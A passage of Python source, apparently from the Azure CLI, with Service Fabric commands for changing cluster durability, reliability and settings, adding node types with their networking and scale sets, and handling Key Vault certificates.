"The durability level is currently mismatched between the cluster ('%s') and the VM extension ('%s').",
curr_node_type_durability,
curr_vmss_durability_level)
# update cluster node type durability
if curr_node_type_durability.lower() != durability_level.lower():
node_type_ref.durability_level = durability_level
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
update_cluster_poll = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cli_ctx)(update_cluster_poll)
# update vmss sf extension durability
if curr_vmss_durability_level.lower() != durability_level.lower():
fabric_ext_ref.settings['durabilityLevel'] = durability_level
fabric_ext_ref.settings['enableParallelJobs'] = True
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
return client.get(resource_group_name, cluster_name)
def update_cluster_upgrade_type(client,
resource_group_name,
cluster_name,
upgrade_mode,
version=None):
if upgrade_mode.lower() != 'manual' and upgrade_mode.lower() != 'automatic':
raise CLIError(
'--upgrade-mode can either be \'manual\' or \'automatic\'')
cluster = client.get(resource_group_name, cluster_name)
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
if upgrade_mode.lower() == 'manual':
if version is None:
raise CLIError(
'When \'--upgrade-mode\' set to \'manual\', --version must be given')
patch_request.cluster_code_version = version
patch_request.upgrade_mode = upgrade_mode
return client.update(resource_group_name, cluster_name, patch_request)
def set_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
value=None,
settings_section_description=None):
def _set(setting_dict, section, parameter, value):
if section not in setting_dict:
setting_dict[section] = {}
setting_dict[section][parameter] = value
return setting_dict
if settings_section_description and (section or parameter or value):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\', \'--parameter\' and \'--value\' to set the settings')
if section or parameter or value:
if section is None or parameter is None or value is None:
raise CLIError(
'\'--section\' , \'--parameter\' and \'--value\' can not be None')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting and 'value' in setting:
setting_dict = _set(setting_dict, setting['section'],
setting['parameter'], setting['value'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _set(setting_dict, section, parameter, value)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
settings_section_description=None):
def _remove(setting_dict, section, parameter):
if section not in setting_dict:
raise CLIError(
"Can't find the section {} in the settings".format(section))
if parameter not in setting_dict[section]:
raise CLIError(
"Can't find the parameter {} in the settings".format(parameter))
del setting_dict[section][parameter]
return setting_dict
if settings_section_description and (section or parameter):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\' and \'--parameter \' to set the settings')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting:
setting_dict = _remove(setting_dict, setting['section'], setting['parameter'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _remove(setting_dict, section, parameter)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_reliability_level(cmd,
client,
resource_group_name,
cluster_name, reliability_level,
auto_add_node=False):
cli_ctx = cmd.cli_ctx
reliability_level = reliability_level.lower()
cluster = client.get(resource_group_name, cluster_name)
instance_now = _get_target_instance(cluster.reliability_level)
instance_target = _get_target_instance(reliability_level)
node_types = [n for n in cluster.node_types if n.is_primary]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
compute_client = compute_client_factory(cli_ctx)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
if instance_target == instance_now:
return cluster
if instance_target > instance_now:
if vmss.sku.capacity < instance_target:
if auto_add_node is not True:
raise CLIError('Please use --auto_add_node to automatically increase the nodes,{} requires {} nodes, but currenty there are {}'.
format(reliability_level, instance_target, vmss.sku.capacity))
vmss.sku.capacity = instance_target
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(
node_types=cluster.node_types, reliability_level=reliability_level)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node_type(cmd,
client,
resource_group_name,
cluster_name,
node_type,
capacity,
vm_user_name,
vm_password,
vm_sku=DEFAULT_SKU,
vm_tier=DEFAULT_TIER,
durability_level=DEFAULT_DURABILITY_LEVEL):
if durability_level.lower() == 'gold':
if vm_sku.lower() != 'standard_d15_v2' and vm_sku.lower() != 'standard_g5':
raise CLIError(
'Only Standard_D15_v2 and Standard_G5 supports Gold durability, please specify --vm-sku to right value')
cluster = client.get(resource_group_name, cluster_name)
if any(n for n in cluster.node_types if n.name.lower() == node_type):
raise CLIError("node type {} already exists in the cluster".format(node_type))
_create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity)
_add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type, capacity, durability_level)
return client.get(resource_group_name, cluster_name)
def _add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type_name, capacity, durability_level):
cluster.node_types.append(NodeTypeDescription(name=node_type_name,
client_connection_endpoint_port=DEFAULT_CLIENT_CONNECTION_ENDPOINT,
http_gateway_endpoint_port=DEFAULT_HTTP_GATEWAY_ENDPOINT,
is_primary=False,
vm_instance_count=int(capacity),
durability_level=durability_level,
application_ports=EndpointRangeDescription(
start_port=DEFAULT_APPLICATION_START_PORT, end_port=DEFAULT_APPLICATION_END_PORT),
ephemeral_ports=EndpointRangeDescription(
start_port=DEFAULT_EPHEMERAL_START, end_port=DEFAULT_EPHEMERAL_END)))
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
poller = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cmd.cli_ctx)(poller)
def _create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type_name, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity):
cli_ctx = cmd.cli_ctx
subnet_name = "subnet_{}".format(1)
network_client = network_client_factory(cli_ctx)
location = _get_resource_group_by_name(cli_ctx, resource_group_name).location
virtual_network = list(
network_client.virtual_networks.list(resource_group_name))[0]
subnets = list(network_client.subnets.list(
resource_group_name, virtual_network.name))
address_prefix = None
index = None
for x in range(1, 255):
address_prefix = '10.0.{}.0/24'.format(x)
index = x
found = False
for s in subnets:
if address_prefix == s.address_prefix:
found = True
if subnet_name.lower() == s.name.lower():
subnet_name = "subnet_{}".format(x)
if found is False:
break
if address_prefix is None:
raise CLIError("Failed to generate the address prefix")
poller = network_client.subnets.begin_create_or_update(resource_group_name,
virtual_network.name,
subnet_name,
Subnet(address_prefix=address_prefix))
subnet = LongRunningOperation(cli_ctx)(poller)
public_address_name = 'LBIP-{}-{}{}'.format(
cluster_name.lower(), node_type_name.lower(), index)
dns_label = '{}-{}{}'.format(cluster_name.lower(),
node_type_name.lower(), index)
lb_name = 'LB-{}-{}{}'.format(cluster_name.lower(),
node_type_name.lower(), index)
if len(lb_name) >= 24:
lb_name = '{}{}'.format(lb_name[0:21], index)
poller = network_client.public_ip_addresses.begin_create_or_update(resource_group_name,
public_address_name,
PublicIPAddress(public_ip_allocation_method='Dynamic',
location=location,
dns_settings=PublicIPAddressDnsSettings(domain_name_label=dns_label)))
publicIp = LongRunningOperation(cli_ctx)(poller)
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cli_ctx)
new_load_balancer_id = '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}'.format(
subscription_id, resource_group_name, lb_name)
backend_address_poll_name = "LoadBalancerBEAddressPool"
frontendip_configuration_name = "LoadBalancerIPConfig"
probe_name = "FabricGatewayProbe"
probe_http_name = "FabricHttpGatewayProbe"
inbound_nat_pools_name = "LoadBalancerBEAddressNatPool"
new_load_balancer = LoadBalancer(id=new_load_balancer_id,
location=location,
frontend_ip_configurations=[FrontendIPConfiguration(name=frontendip_configuration_name,
public_ip_address=PublicIPAddress(id=publicIp.id))],
backend_address_pools=[BackendAddressPool(
name=backend_address_poll_name)],
load_balancing_rules=[LoadBalancingRule(name='LBRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.
format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_TCP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_TCP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_name))),
LoadBalancingRule(name='LBHttpRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_HTTP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_HTTP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_http_name)))],
probes=[Probe(protocol='tcp',
name=probe_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_TCP_PORT),
Probe(protocol='tcp',
name=probe_http_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_HTTP_PORT)],
inbound_nat_pools=[InboundNatPool(protocol='tcp',
name=inbound_nat_pools_name,
backend_port=DEFAULT_BACKEND_PORT,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port_range_start=DEFAULT_FRONTEND_PORT_RANGE_START,
frontend_port_range_end=DEFAULT_FRONTEND_PORT_RANGE_END)])
poller = network_client.load_balancers.begin_create_or_update(
resource_group_name, lb_name, new_load_balancer)
LongRunningOperation(cli_ctx)(poller)
new_load_balancer = network_client.load_balancers.get(
resource_group_name, lb_name)
backend_address_pools = []
inbound_nat_pools = []
for p in new_load_balancer.backend_address_pools:
backend_address_pools.append(SubResource(id=p.id))
for p in new_load_balancer.inbound_nat_pools:
inbound_nat_pools.append(SubResource(id=p.id))
network_config_name = 'NIC-{}-{}'.format(node_type_name.lower(), node_type_name.lower())
if len(network_config_name) >= 24:
network_config_name = network_config_name[0:22]
ip_config_name = 'Nic-{}'.format(node_type_name.lower())
if len(ip_config_name) >= 24:
ip_config_name = network_config_name[0:22]
vm_network_profile = VirtualMachineScaleSetNetworkProfile(network_interface_configurations=[VirtualMachineScaleSetNetworkConfiguration(name=network_config_name,
primary=True,
ip_configurations=[VirtualMachineScaleSetIPConfiguration(name=ip_config_name,
load_balancer_backend_address_pools=backend_address_pools,
load_balancer_inbound_nat_pools=inbound_nat_pools,
subnet=ApiEntityReference(id=subnet.id))])])
compute_client = compute_client_factory(cli_ctx)
node_type_name_ref = cluster.node_types[0].name
vmss_reference = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type_name_ref)
def create_vhd(cli_ctx, resource_group_name, cluster_name, node_type, location):
storage_name = '{}{}'.format(cluster_name.lower(), node_type.lower())
name = ""
vhds = []
for n in storage_name:
if n.isalpha() or n.isdigit():
name += n
if len(name) >= 21:
break
for i in range(1, 6):
acc = create_storage_account(
cli_ctx, resource_group_name.lower(), '{}{}'.format(name, i), location)
vhds.append('{}{}'.format(acc[0].primary_endpoints.blob, 'vhd'))
return vhds
def create_storage_account(cli_ctx, resource_group_name, storage_name, location):
from azure.mgmt.storage.models import Sku, SkuName
storage_client = storage_client_factory(cli_ctx)
LongRunningOperation(cli_ctx)(storage_client.storage_accounts.create(resource_group_name,
storage_name,
StorageAccountCreateParameters(sku=Sku(name=SkuName.standard_lrs),
kind='storage',
location=location)))
acc_prop = storage_client.storage_accounts.get_properties(
resource_group_name, storage_name)
acc_keys = storage_client.storage_accounts.list_keys(
resource_group_name, storage_name)
return acc_prop, acc_keys
publisher = 'MicrosoftWindowsServer'
offer = 'WindowsServer'
version = 'latest'
sku = os_dic[DEFAULT_OS]
if cluster.vm_image.lower() == 'linux':
publisher = 'Canonical'
offer = 'UbuntuServer'
version = 'latest'
sku = os_dic['UbuntuServer1604']
storage_profile = VirtualMachineScaleSetStorageProfile(image_reference=ImageReference(publisher=publisher,
offer=offer,
sku=sku,
version=version),
os_disk=VirtualMachineScaleSetOSDisk(caching='ReadOnly',
create_option='FromImage',
name='vmssosdisk',
vhd_containers=create_vhd(cli_ctx, resource_group_name, cluster_name, node_type_name, location)))
os_profile = VirtualMachineScaleSetOSProfile(computer_name_prefix=node_type_name,
admin_password=vm_password,
admin_username=vm_user_name,
secrets=vmss_reference.virtual_machine_profile.os_profile.secrets)
diagnostics_storage_name = cluster.diagnostics_storage_account_config.storage_account_name
diagnostics_ext = None
fabric_ext = None
diagnostics_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
) == 'IaaSDiagnostics'.lower()]
if any(diagnostics_exts):
diagnostics_ext = diagnostics_exts[0]
diagnostics_account = diagnostics_ext.settings['StorageAccount']
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_account)
import json
json_data = json.loads(
'{"storageAccountName": "", "storageAccountKey": "", "storageAccountEndPoint": ""}')
json_data['storageAccountName'] = diagnostics_account
json_data['storageAccountKey'] = list_results.keys[0].value
json_data['storageAccountEndPoint'] = "https://core.windows.net/"
diagnostics_ext.protected_settings = json_data
fabric_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
) == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type1.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if any(fabric_exts):
fabric_ext = fabric_exts[0]
if fabric_ext is None:
raise CLIError("No valid fabric extension found")
fabric_ext.settings['nodeTypeRef'] = node_type_name
fabric_ext.settings['durabilityLevel'] = durability_level
if 'nicPrefixOverride' not in fabric_ext.settings:
fabric_ext.settings['nicPrefixOverride'] = address_prefix
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_storage_name)
import json
json_data = json.loads(
'{"StorageAccountKey1": "", "StorageAccountKey2": ""}')
fabric_ext.protected_settings = json_data
fabric_ext.protected_settings['StorageAccountKey1'] = list_results.keys[0].value
fabric_ext.protected_settings['StorageAccountKey2'] = list_results.keys[1].value
extensions = [fabric_ext]
if diagnostics_ext:
extensions.append(diagnostics_ext)
vm_ext_profile = VirtualMachineScaleSetExtensionProfile(
extensions=extensions)
virtual_machine_scale_set_profile = VirtualMachineScaleSetVMProfile(extension_profile=vm_ext_profile,
os_profile=os_profile,
storage_profile=storage_profile,
network_profile=vm_network_profile)
poller = compute_client.virtual_machine_scale_sets.begin_create_or_update(resource_group_name,
node_type_name,
VirtualMachineScaleSet(location=location,
sku=ComputeSku(name=vm_sku, tier=vm_tier, capacity=capacity),
overprovision=False,
upgrade_policy=UpgradePolicy(mode=UpgradeMode.automatic),
virtual_machine_profile=virtual_machine_scale_set_profile))
LongRunningOperation(cli_ctx)(poller)
def _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster_id, node_type_name):
vmsses = list(compute_client.virtual_machine_scale_sets.list(resource_group_name))
for vmss in vmsses:
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is not None:
curr_cluster_id = _get_cluster_id_in_sf_extension(fabric_ext)
if curr_cluster_id.lower() == cluster_id.lower() and fabric_ext.settings["nodeTypeRef"].lower() == node_type_name.lower():
return vmss
raise CLIError("Failed to find vmss in resource group {} for cluster id {} and node type {}".format(resource_group_name, cluster_id, node_type_name))
def _verify_cert_function_parameter(certificate_file=None,
certificate_password=None,
vault_name=None, # pylint: disable=unused-argument
vault_resource_group_name=None, # pylint: disable=unused-argument
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
if certificate_file:
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--certificate-file\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--certificate-file\' is present')
else:
if secret_identifier:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if certificate_password:
raise CLIError(
'\'--certificate-password\' is ingored if \'--secret-identifier\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--secret-identifier\' is present')
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--secret-identifier\' is present')
else:
if certificate_subject_name:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if secret_identifier:
raise CLIError(
'\'--secret-identifier\' is ingored if \'--secret-identifier\' is present')
else:
raise CLIError("Invalid input")
def _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
_verify_cert_function_parameter(certificate_file, certificate_password,
vault_name, vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
output_file = None
rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
location = rg.location
vault_id = None
secret_url = None
certificate_thumbprint = None
VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
_create_keyvault.__doc__ = VaultProperties.__doc__
if secret_identifier is not None:
vault = _get_vault_from_secret_identifier(cli_ctx, secret_identifier)
vault_id = vault.id
certificate_thumbprint = _get_thumbprint_from_secret_identifier(
cli_ctx, vault, secret_identifier)
secret_url = secret_identifier
else:
if vault_resource_group_name is None:
logger.info("vault_resource_group_name not set, using %s.", resource_group_name)
vault_resource_group_name = resource_group_name
if vault_name is None:
logger.info("vault_name not set using '%s' as vault name.", vault_resource_group_name)
vault_name = vault_resource_group_name
vault = _safe_get_vault(cli_ctx, vault_resource_group_name, vault_name)
if certificate_file is not None:
if vault is None:
logger.info("Creating key vault")
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
logger.info("Import certificate")
result = import_certificate(
cli_ctx, vault_uri, certificate_name, certificate_file, password=certificate_password)
vault_id = vault.id
secret_url = result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(result.x509_thumbprint))
else:
if vault is None:
logger.info("Creating key vault")
if cmd.supported_api_version(resource_type=ResourceType.MGMT_KEYVAULT, min_api='2018-02-14'):
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
else:
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
logger.info("Wait for key vault ready")
time.sleep(20)
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
policy = _get_default_policy(cli_ctx, certificate_subject_name)
logger.info("Creating self-signed certificate")
_create_self_signed_key_vault_certificate.__doc__ = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'key_vault_client#KeyVaultClient').__doc__
result = _create_self_signed_key_vault_certificate(
cli_ctx, vault_uri, certificate_name, policy, certificate_output_folder=certificate_output_folder)
kv_result = result[0]
output_file = result[1]
vault_id = vault.id
secret_url = kv_result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(kv_result.x509_thumbprint))
return vault_id, secret_url, certificate_thumbprint, output_file
# pylint: disable=inconsistent-return-statements
def _add_cert_to_vmss(cli_ctx, vmss, resource_group_name, vault_id, secret_url):
compute_client = compute_client_factory(cli_ctx)
secrets = [
s for s in vmss.virtual_machine_profile.os_profile.secrets if s.source_vault.id == vault_id]
if secrets is None or secrets == []:
if vmss.virtual_machine_profile.os_profile.secrets is None:
vmss.virtual_machine_profile.os_profile.secrets = []
new_vault_certificates = []
new_vault_certificates.append(VaultCertificate(certificate_url=secret_url, certificate_store='my'))
new_source_vault = SubResource(id=vault_id)
vmss.virtual_machine_profile.os_profile.secrets.append(VaultSecretGroup(source_vault=new_source_vault,
vault_certificates=new_vault_certificates))
else:
if secrets[0].vault_certificates is not None:
certs = [
c for c in secrets[0].vault_certificates if c.certificate_url == secret_url]
if certs is None or certs == []:
secrets[0].vault_certificates.append(
VaultCertificate(certificate_url=secret_url, certificate_store='my'))
else:
return
else:
secrets[0].vault_certificates = []
secrets[0].vault_certificates.append(
VaultCertificate(secret_url, 'my'))
poller = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
return LongRunningOperation(cli_ctx)(poller)
def _get_sf_vm_extension(vmss):
fabric_ext = None
for ext in vmss.virtual_machine_profile.extension_profile.extensions:
extension_type = None
if hasattr(ext, 'type1') and ext.type1 is not None:
extension_type = ext.type1.lower()
elif hasattr(ext, 'type_properties_type') and ext.type_properties_type is not None:
extension_type = ext.type_properties_type.lower()
if extension_type is not None and extension_type in (SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME, SERVICE_FABRIC_LINUX_NODE_EXT_NAME):
fabric_ext = ext
break
if fabric_ext is None or fabric_ext == []:
return None
return fabric_ext
def _get_cluster_id_in_sf_extension(fabric_ext):
cluster_endpoint = fabric_ext.settings["clusterEndpoint"]
endpoint_list = cluster_endpoint.split('/')
cluster_id = endpoint_list[len(endpoint_list) - 1]
return cluster_id
def _add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster_id, vault_id, secret_url, is_cluster_cert=False, thumbprint=None):
threads = []
import threading
compute_client = compute_client_factory(cli_ctx)
vmsses = list(compute_client.virtual_machine_scale_sets.list(resource_group_name))
if vmsses is not None:
for vmss in vmsses:
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is not None and (cluster_id is None or _get_cluster_id_in_sf_extension(fabric_ext).lower() == cluster_id.lower()):
if is_cluster_cert:
# add cert to sf extension
import json
secondary_setting = json.loads(
'{{"thumbprint":"{0}","x509StoreName":"{1}"}}'.format(thumbprint, 'my'))
fabric_ext.settings["certificateSecondary"] = secondary_setting
t = threading.Thread(target=_add_cert_to_vmss, args=[cli_ctx, vmss, resource_group_name, vault_id, secret_url])
t.start()
threads.append(t)
for t in threads:
t.join()
# pylint: disable=inconsistent-return-statements
def _get_target_instance(reliability_level):
level = reliability_level.lower()
if level == 'none':
return 1
if level == 'bronze':
return 3
if level == 'silver':
return 5
if level == 'gold':
return 7
if level == 'platinum':
return 9
# pylint: disable=inconsistent-return-statements
def _get_reliability_level(cluster_size):
size = int(cluster_size)
if 0 < size < 3:
return 'None'
if 3 <= size < 5:
return 'Bronze'
if 5 <= size < 7:
return 'Silver'
if 7 <= size < 9:
return 'Gold'
if size >= 9:
return 'Platinum'
def _fabric_settings_to_dict(fabric_settings):
d = {}
if fabric_settings:
for s1 in fabric_settings:
section_name = s1.name
if section_name not in d:
d[section_name] = {}
if s1.parameters:
for s2 in s1.parameters:
parameter_name = s2.name
d[section_name][parameter_name] = s2.value
return d
def _dict_to_fabric_settings(setting_dict):
settings = []
if setting_dict and any(setting_dict):
for k, v in setting_dict.items():
parameters = []
setting_des = SettingsSectionDescription(name=k, parameters=parameters)
for kk, vv in v.items():
setting_des.parameters.append(
SettingsParameterDescription(name=kk, value=vv))
if setting_des.parameters and any(setting_des.parameters):
settings.append(setting_des)
return settings
def _deploy_arm_template_core(cmd,
resource_group_name,
template,
parameters,
deployment_name=None,
mode='incremental',
validate_only=False,
no_wait=False):
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, template_link=None, parameters=parameters, mode=mode)
client = resource_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate_only:
deploy_poll = sdk_no_wait(no_wait, client.deployments.validate, resource_group_name, deployment_name,
deployment)
else:
deploy_poll = sdk_no_wait(no_wait, client.deployments.create_or_update, resource_group_name,
deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
if validate_only:
return sdk_no_wait(no_wait, client.deployments.validate, resource_group_name, deployment_name,
properties)
deploy_poll = sdk_no_wait(no_wait, client.deployments.create_or_update, resource_group_name, deployment_name,
properties)
return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
def _get_vault_name(resource_group_name, vault_name):
if not vault_name:
return resource_group_name
return vault_name
def _get_certificate_name(certificate_subject_name, resource_group_name):
if certificate_subject_name is None:
certificate_name = resource_group_name
else:
certificate_name = certificate_subject_name
name = ""
for n in certificate_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
certificate_name = name
if certificate_subject_name is None:
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
certificate_name = "{}{}".format(certificate_name, suffix)
return certificate_name
# pylint: disable=inconsistent-return-statements
def _get_vault_from_secret_identifier(cli_ctx, secret_identifier):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
vault_name = urlparse(secret_identifier).hostname.split('.')[0]
vaults = key_vault_client.list()
if vaults is not None:
vault = [v for v in vaults if v.name.lower() == vault_name.lower()]
if vault:
return vault[0]
raise CLIError("Unable to find vault with name '{}'. Please make sure the secret identifier '{}' is correct.".format(vault_name, secret_identifier))
def _get_vault_uri_and_resource_group_name(cli_ctx, vault):
client = keyvault_client_factory(cli_ctx).vaults
vault_resource_group_name = vault.id.split('/')[4]
v = client.get(vault_resource_group_name, vault.name)
vault_uri = v.properties.vault_uri
return vault_uri, vault_resource_group_name
def _safe_get_vault(cli_ctx, resource_group_name, vault_name):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
try:
vault = key_vault_client.get(resource_group_name, vault_name)
return vault
except CloudError as ex:
if ex.error.error == 'ResourceNotFound':
return None
raise
def _asn1_to_iso8601(asn1_date):
import dateutil.parser
if isinstance(asn1_date, bytes):
asn1_date = asn1_date.decode('utf-8')
return dateutil.parser.parse(asn1_date)
def _get_thumbprint_from_secret_identifier(cli_ctx, vault, secret_identifier):
secret_uri = urlparse(secret_identifier)
path = secret_uri.path
segment = path.split('/')
secret_name = segment[2]
secret_version = segment[3]
vault_uri_group = _get_vault_uri_and_resource_group_name(cli_ctx, vault)
vault_uri = vault_uri_group[0]
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
secret = client_not_arm.get_secret(vault_uri, secret_name, secret_version)
cert_bytes = secret.value
x509 = None
import base64
decoded = base64.b64decode(cert_bytes)
try:
x509 = crypto.load_pkcs12(decoded).get_certificate()
except (ValueError, crypto.Error):
pass
if not x509:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, cert_bytes)
if not x509:
raise Exception('invalid certificate')
thumbprint = x509.digest("sha1").decode("utf-8").replace(':', '')
return thumbprint
def _get_certificate(client, vault_base_url, certificate_name):
""" Download a certificate from a KeyVault. """
cert = client.get_certificate(vault_base_url, certificate_name, '')
return cert
def import_certificate(cli_ctx, vault_base_url, certificate_name, certificate_data,
disabled=False, password=None, certificate_policy=None, tags=None):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
import binascii
certificate_data = open(certificate_data, 'rb').read()
x509 = None
content_type = None
try:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, certificate_data)
# if we get here, we know it was a PEM file
content_type = 'application/x-pem-file'
try:
# for PEM files (including automatic endline conversion for
# Windows)
certificate_data = certificate_data.decode(
'utf-8').replace('\r\n', '\n')
except UnicodeDecodeError:
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except (ValueError, crypto.Error):
pass
if not x509:
try:
if password:
x509 = crypto.load_pkcs12(
certificate_data, password).get_certificate()
else:
x509 = crypto.load_pkcs12(certificate_data).get_certificate()
content_type = 'application/x-pkcs12'
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except crypto.Error:
raise CLIError(
'We could not parse the provided certificate as .pem or .pfx. '
'Please verify the certificate with OpenSSL.')
not_before, not_after = None, None
if x509.get_notBefore():
